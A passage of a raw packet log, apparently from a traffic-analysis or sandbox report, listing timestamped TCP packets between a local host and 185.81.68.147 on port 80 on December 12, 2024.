                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.356499910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.356594086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.496021986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.496068954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.496196032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.496412039 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.496670008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.496751070 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.497216940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.497359037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.498039961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.498265028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.498317957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.499264002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.499393940 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.499483109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.499708891 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.500296116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.501187086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.501298904 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.501379013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.501513958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.501744032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.502312899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.502320051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.502398968 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.503278971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.503361940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.503706932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.504391909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.504501104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.505286932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.505414963 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.505794048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.506385088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.506392002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.507380962 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.507404089 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.507785082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.508382082 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.508486986 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.509402990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.509409904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.509449959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.509496927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.509497881 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.510363102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.510996103 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.511432886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.511440992 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.511512995 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.512404919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.512540102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.512638092 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.513438940 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.513447046 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.513521910 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.514502048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.514673948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.515463114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.515609026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.515707016 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.516462088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.517031908 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.517112970 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.517472982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.517669916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.518465996 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.518536091 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.519210100 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.519618034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.519706011 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.519777060 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.520524979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.520602942 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.521599054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.521605968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.521614075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.521688938 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.522619009 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.522831917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.523614883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.523622036 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.523699999 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.524578094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.524892092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.524971008 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.525685072 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.525691986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.525810957 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.526629925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.527674913 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.527682066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.527715921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.527793884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.528646946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.529704094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.529710054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.529717922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.529799938 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.530690908 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.531147003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.531397104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.531737089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.531743050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.531852007 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.532708883 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.533330917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.533587933 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.533756971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.533763885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.533881903 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.534734964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.535479069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.535590887 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.535789967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.535798073 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.535887003 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.536770105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.537234068 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.537350893 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.537811041 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.538147926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.538311005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.538839102 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.538847923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.539423943 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.540775061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.540864944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.540870905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.541012049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.541220903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.541953087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.541960001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.542062044 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.542924881 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.543896914 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.543905020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.543948889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.543967962 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.544020891 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.544902086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.545073986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.546068907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.546148062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.546230078 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.546909094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.547028065 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.547041893 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.547713041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.547914982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.548326015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.548619032 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.548896074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.688667059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.688730955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.688829899 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.688994884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.689069986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.689131021 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.690025091 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.690104008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.690150976 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.691066980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.691168070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.691236973 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.692044973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.692183971 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.692250013 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.693062067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.693111897 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.693377018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.694099903 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.694252968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.694653034 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.695152044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.695276022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.695388079 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.696152925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.696227074 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.696459055 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.697132111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.697308064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.697350025 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.698199987 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.698304892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.698318958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.699141979 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.699270964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.699373007 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.700205088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.700256109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.700418949 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.701195002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.701247931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.701297998 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.702181101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.702311039 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.702326059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.703212976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.703295946 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.703367949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.704253912 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.704396009 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.704421997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.705310106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.705316067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.705344915 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.706336021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.706439972 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.706500053 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.707297087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.707386017 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.707398891 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.708277941 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.708415985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.708482981 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.709373951 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.709496021 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.709541082 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.710330963 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.710510969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.710587978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.711360931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.711401939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.711446047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.712352037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.712485075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.712557077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.713397980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.713452101 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.713499069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.714397907 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.714438915 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.714502096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.715396881 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.715465069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.715488911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.716423988 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.716609001 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.716680050 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.717432022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.717551947 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.717602968 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.718457937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.718508005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.718601942 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.719482899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.719598055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.719599962 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.720468044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.720557928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.720633984 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.721487045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.721540928 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.721573114 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.722470045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:48.722552061 CET4994680192.168.2.10185.81.68.147
